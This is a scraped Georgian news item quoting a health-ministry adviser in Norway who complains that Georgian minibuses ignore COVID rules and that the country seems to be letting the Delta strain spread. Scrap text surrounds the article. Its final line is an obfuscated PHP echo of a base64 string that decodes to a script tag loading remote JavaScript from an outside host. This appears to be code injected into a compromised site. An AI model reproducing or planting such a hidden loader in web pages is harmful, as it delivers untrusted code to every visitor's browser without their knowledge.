celsiusi
ავერსი საქკაბელი
ის რომ საქართველომ გადაწყვიტა დელტა შტამის მეშვეობით (მაინც სწრაფად ვრცელდებაო) ჯოგურ იმუნიტეტს მიაღწიოს ვაქცინაციის გარეშე ეს აშკარაა...ვინც გადარჩება, გადარჩება, არის დევიზი, - ამის შესახებ ნორვეგიის სამეფოს ჯანდაცვის სამინისტროს მრჩეველი ზაზა წერეთელი წერს. 
 
"ვინც გადარჩება, გადარჩება, არის დევიზი, დღევანდელმა შემთხვევამ კიდევ ერთხელ დამარწმუნა ამაში.  გადავწყვიტე სამარშრუტო ტაქსით მესარგებლა და მენახა როგორ იცავენ კოვიდ წესებს იქ.  და აი ჩავჯექი ამ სამარშურტო ტაქსში და ჰოი საოცრებავ, ის გაივსო და მძღოლო მაინც აჩერებს და უშვებს ხალხს.  ჩემს შეკითხვაზე, იცის თუ არა მან რომ ქვეყანაში პანდემიაა და რომ დისტანციია უნდა დაიცვას და ერთმანეთტან ჩახუტებას უნდა მოვერიდოთ, მან მიპასუხა რომ მას აქვს უფლება 6 ადამიანი დააყენოს ფეხზე უკვე გადავსებულ სამარშრუტო ტაქსში.  საინტერესო იყო ის რომ ზოგიერთი მგზავრიც დადგას მის დასაცავად, ხალხს წასვლა სურსო
მოკლედ, მე არ ვიცი ვინ მისცა ამ პანდემიის დროს სამარშრუტო ტაქსებს უფლება რომ გადატენილმა იაროს და ყოველგვარი წესები უგულვებელყოს, მაგრამ ამას რომ არავინ აკონტროლებს და არც არავის ანაღვლებს აშკარაა ასე რომ გაუმარჯოს დელტა შტამს საქართველოში....
p.S ოლიმპიელების დახვედრაზე აეროპორტში უკვე არაფერს ვიტყვი", წერს ზაზა წერეთელი. 
1115
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");